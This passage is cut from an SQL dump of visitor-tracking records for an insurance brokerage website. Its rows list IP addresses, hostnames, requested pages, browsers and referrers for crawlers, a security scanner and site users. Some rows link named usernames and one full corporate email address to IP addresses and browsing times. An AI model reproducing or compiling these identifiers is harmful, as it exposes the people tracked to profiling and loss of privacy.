)','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13185,'0b_d45537a6459299407038fd0c066f1207','1459867125','45.55.44.84','45.55.44.84','/register/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13188,'0b_d45537a6459299407038fd0c066f1207','1459867136','45.55.44.84','45.55.44.84','/insentives/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13191,'0b_d45537a6459299407038fd0c066f1207','1459867147','45.55.44.84','45.55.44.84','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(13194,'0b_d45537a6459299407038fd0c066f1207','1459867158','45.55.44.84','45.55.44.84','/case-status/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13197,'0b_d45537a6459299407038fd0c066f1207','1459867168','45.55.44.84','45.55.44.84','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13200,'0b_d45537a6459299407038fd0c066f1207','1459867179','45.55.44.84','45.55.44.84','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13203,'0b_d45537a6459299407038fd0c066f1207','1459867190','45.55.44.84','45.55.44.84','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13205,'0b_d45537a6459299407038fd0c066f1207','1459867202','45.55.44.84','45.55.44.84','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(13208,'0b_d45537a6459299407038fd0c066f1207','1459867213','45.55.44.84','45.55.44.84','/members/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(13211,'0b_d45537a6459299407038fd0c066f1207','1459867224','45.55.44.84','45.55.44.84','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(13214,'0b_d45537a6459299407038fd0c066f1207','1459867234','45.55.44.84','45.55.44.84','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(13217,'0b_d45537a6459299407038fd0c066f1207','1459867245','45.55.44.84','45.55.44.84','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13220,'0b_d45537a6459299407038fd0c066f1207','1459867256','45.55.44.84','45.55.44.84','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13221,'0b_d45537a6459299407038fd0c066f1207','1459867267','45.55.44.84','45.55.44.84','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13224,'0b_d45537a6459299407038fd0c066f1207','1459867278','45.55.44.84','45.55.44.84','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(13226,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459867952','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13229,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459867952','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13230,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459867953','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13233,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459868020','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13236,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459868031','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13238,'0b_8365b08ba9bfbd9ca152119be1d617cb','1459868533','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13239,'0b_8365b08ba9bfbd9ca152119be1d617cb','1459868536','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13242,'0b_8365b08ba9bfbd9ca152119be1d617cb','1459868539','69.175.22.218','newscan02.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13244,'0b_8365b08ba9bfbd9ca152119be1d617cb','1459868545','69.175.22.218','newscan02.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(13247,'0b_2a69d7b4f60de301a0c46a2d1d4968a9','1459868621','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13248,'0b_2a69d7b4f60de301a0c46a2d1d4968a9','1459868623','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13250,'0b_1e32b6b114180c6f4f12cf896ba35bea','1459869105','180.76.15.160','baiduspider-180-76-15-160.crawl.baidu.com','/?p=283','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(13251,'0b_cf63ef99282ffac5d7101610f7997768','1459869106','180.76.15.13','baiduspider-180-76-15-13.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(13254,'0b_b5df3db24a83fd5b9fb799e1bab469a3','1459869243','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13257,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459870341','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13259,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459870341','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13260,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459870342','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(13263,'0b_ba83d15bcbc9f7204deed9b48ebbff8b','1459870345','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13266,'0b_2a69d7b4f60de301a0c46a2d1d4968a9','1459870558','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(13269,'0b_2a69d7b4f60de301a0c46a2d1d4968a9','1459870559','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13272,'0b_885f083b9b77b268dfcd1d60cd5c1b57','1459871494','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13274,'0b_2aa5af4ee2e2df5fdecc7d477fdcb75e','1459873047','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13277,'0b_27f6a57f3e6a31b71f1a64f1818784f0','1459873374','67.83.96.143','ool-4353608f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1024 x 819','','','','','','0','0',0),(13280,'0b_27f6a57f3e6a31b71f1a64f1818784f0','1459873376','67.83.96.143','ool-4353608f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','','','0','0',0),(13281,'0b_27f6a57f3e6a31b71f1a64f1818784f0','1459873389','67.83.96.143','ool-4353608f.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','','','0','0',0),(13284,'0b_27f6a57f3e6a31b71f1a64f1818784f0','1459873596','67.83.96.143','ool-4353608f.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(13287,'0b_94def9a44f12cce271560a123f69f0ac','1459873788','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13290,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459874754','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13292,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459874765','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13295,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459874778','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13296,'0b_04ea7d54ebe62cae81e5003f46d1afd5','1459874800','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(13299,'0b_77f6ae0d6684688084f3a90fd97d7587','1459874931','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(13301,'0b_77f6ae0d6684688084f3a90fd97d7587','1459874933','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(13304,'0b_27f4dec51d70397d78ac0a63361676db','1459874922','220.181.108.143','220.181.108.143','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(13307,'0b_77f6ae0d6684688084f3a90fd97d7587','1459875001','50.74.240.14','mail.kentco.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(13308,'0b_0932026c82ed379a6d36521f8ebc3613','1459875321','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13310,'0b_9390bb9e1ca9d97cc5f32d6193669052','1459875869','66.249.83.147,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(13311,'0b_bdc7cee97fe7df823e8600d2d07c48c1','1459876480','180.76.15.144','baiduspider-180-76-15-144.crawl.baidu.com','/term-quotes/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(13313,'0b_fa7cad4353d26e53764406bcf11f57d6','1459879101','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13314,'0b_f1016a14a241e89bc47701261aff35d5','1459879246','100.43.91.1','spider-100-43-91-1.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(13317,'0b_6f5b0363c6edba1797a75e811c4ba337','1459879250','141.8.143.235','spider-141-8-143-235.yandex.com','/igo/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(13320,'0b_9b657fb571420aca9c7c48ac03b21bb5','1459881138','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(13323,'0b_9b657fb571420aca9c7c48ac03b21bb5','1459881138','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(13326,'0b_9b657fb571420aca9c7c48ac03b21bb5','1459881140','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(13328,'0b_9b657fb571420aca9c7c48ac03b21bb5','1459881159','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13329,'0b_9b657fb571420aca9c7c48ac03b21bb5','1459881166','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13332,'0b_a4f4772484c978e6699cac0cb2ca977c','1459882103','50.175.206.151','c-50-175-206-151.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','','Google','','','','','0','0',0),(13335,'0b_a4f4772484c978e6699cac0cb2ca977c','1459882105','50.175.206.151','c-50-175-206-151.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(13337,'0b_db1a3e5731caca329c6a037039a520c5','1459882185','213.239.205.118','static.213-239-205-118.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; InfoPath.3; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(13338,'0b_024d893eead13b6c7d83d80c920c9975','1459883280','66.249.73.196','crawl-66-249-73-196.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13341,'0b_024d893eead13b6c7d83d80c920c9975','1459883283','66.249.73.196','crawl-66-249-73-196.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13343,'0b_0843fb7c9ef735e734d2357a7c90da89','1459883992','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1680 x 1050','Google','','','','','0','0',0),(13346,'0b_0843fb7c9ef735e734d2357a7c90da89','1459883994','24.146.252.22','ool-1892fc16.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(13349,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884101','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13350,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884162','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13352,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884162','24.146.252.22','ool-1892fc16.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(13355,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884175','24.146.252.22','ool-1892fc16.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13358,'0b_b015a65957d4bccc0586c126f08c3038','1459884301','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(13359,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884316','24.146.252.22','ool-1892fc16.dyn.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13361,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884319','24.146.252.22','ool-1892fc16.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13362,'0b_447380050b8e8e7472bdab1224be3aba','1459884319','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(13365,'0b_2bccf32f45f7470dbbe3142d625b0a13','1459884330','204.63.44.144','204.63.44.144','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwiHn_TznPjLAhWJ_R4KHbh-BSwQ_BcIazAL&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg','',0,'Win7 x64','IE 11','us','1164 x 931','','','','','','0','0',0),(13368,'0b_2bccf32f45f7470dbbe3142d625b0a13','1459884341','204.63.44.144','204.63.44.144','/home/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1164 x 931','','','','','','0','0',0),(13371,'0b_2bccf32f45f7470dbbe3142d625b0a13','1459884341','204.63.44.144','204.63.44.144','/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1164 x 931','','','','','','0','0',0),(13374,'0b_2bccf32f45f7470dbbe3142d625b0a13','1459884350','204.63.44.144','204.63.44.144','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1164 x 931','','','','','','0','0',0),(13377,'0b_2bccf32f45f7470dbbe3142d625b0a13','1459884351','204.63.44.144','204.63.44.144','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1164 x 931','','','','','','0','0',0),(13379,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884361','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13382,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884386','24.146.252.22','ool-1892fc16.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13385,'0b_6f743fe774d0143ef129d763344d90c6','1459884392','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/robots.txt','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13386,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884392','24.146.252.22','ool-1892fc16.dyn.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13388,'0b_6f743fe774d0143ef129d763344d90c6','1459884393','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13391,'0b_6f743fe774d0143ef129d763344d90c6','1459884394','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/about-us/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13392,'0b_6f743fe774d0143ef129d763344d90c6','1459884394','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/about-us/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13395,'0b_6f743fe774d0143ef129d763344d90c6','1459884395','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/about-us/data-slide=prev','Aboundex/0.3 